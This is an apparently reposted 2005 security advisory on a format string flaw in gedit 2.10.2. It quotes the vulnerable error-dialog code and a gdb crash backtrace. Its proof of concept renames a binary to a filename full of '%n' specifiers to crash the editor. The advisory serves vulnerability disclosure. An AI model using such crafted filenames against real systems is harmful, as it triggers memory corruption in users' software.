首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>新闻>安全新闻>文章内容
pst.advisory: gedit fun. opensource is god .lol windows
来源:www.0xbadexworm.org 作者:jsk 发布时间:2005-05-31  

pst.advisory: gedit fun. opensource is god .lol windows


Systems affected:

gedit 2.10.2


no affected

all exploitable

1:why: gedit is power tool .. it used to edit *.c *.pl *.py ............

when it open a bin .. ths bin's name or filename is format strings ... it is exploitable


2:tips:


void
gedit_utils_error_reporting_loading_file (
const gchar *uri,
const GeditEncoding *encoding,
GError *error,
GtkWindow *parent)
{
............


if (error_message == NULL)
{
if ((error == NULL) || (error->message == NULL))
error_message = g_strdup_printf (
_("Could not open the file \"%s\"."),
uri_for_display);................name
else
error_message = g_strdup_printf (
_("Could not open the file \"%s\".\n\n%s."),
uri_for_display, error->message);..........name

}

g_free (encoding_name);

dialog = gtk_message_dialog_new (
parent,
GTK_DIALOG_MODAL | GTK_DIALOG_DESTROY_WITH_PARENT,
GTK_MESSAGE_ERROR,
GTK_BUTTONS_OK,
error_message);....................boom......

3: more show

Program received signal SIGSEGV, Segmentation fault.
0x40f9b740 in gtk_window_set_transient_for () from /usr/lib/libgtk-x11-2.0.so.0
(gdb) bt
#0 0x40f9b740 in gtk_window_set_transient_for ()
from /usr/lib/libgtk-x11-2.0.so.0
#1 0x40ea33c9 in gtk_message_dialog_new () from /usr/lib/libgtk-x11-2.0.so.0
#2 0x080723a1 in gedit_utils_error_reporting_loading_file ()
#3 0x080779f8 in gedit_file_open_from_stdin ()
#4 0x00000000 in ?? ()
#5 0x083f98e8 in ?? ()
#6 0x0813f538 in ?? ()
#7 0x080ad668 in TC_GNOME_Gedit_Application_struct ()
#8 0x08339e30 in ?? ()
#9 0x00000000 in ?? ()
#10 0x41287ca1 in __default_morecore () from /lib/libc.so.6


4: A LAME proof-of-concept

bash-2.05b#cat fmtexp.c

#include <stdio.h>


int
main()
{
printf("hah gedit\n");
}


bash-2.05b#gcc -o fk fmtexp.c

bash-2.05b#mv fk AA%n%n%n.c

bash-2.05b#gedit AA%n%n%n.c

no working exploit will be here..:P

CREDIT:

jsk (www.0xbadexworm.org) discovery this vulnerability

ths: all members from PST and doris


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·几个常见的CGI攻击方法
·RAdmin 服务端高级配置
·linux/x86 add root user r00t w
·利用SSL漏洞 专家几分钟攻破微软
·二代身份证可能导致身份信息泄露
·外泄Windows代码者来自微软合作
·呵呵~今天换服务器了
·美国老牌黑客往事:控制电台全部
·支付宝控件漏洞——到底是谁在撒
·Halflife 3.1.1.1 - Remote expl
·我国首破病毒大案 熊猫烧香作者
·“互联网之父”建议深入研究安全
  相关文章
·Golden FTP Server Pro Remote U
·pst.advisory : gxine remote ex
·Halflife 3.1.1.1 - Remote expl
·超文本传输协议有漏洞,导致新型
·Microsoft Internet Explorer ja
·Windows Xp Sp2对于溢出保护
·利用MS05-039漏洞传播的蠕虫公告
·Gmail存在严重安全漏洞 无需密码
·微软发布10月份安全公告 修复多
·RevilloC MailServer 1.x (RCPT
·miniBB <= 2.0.2 (bb_func_tx
·外泄Windows代码者来自微软合作
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved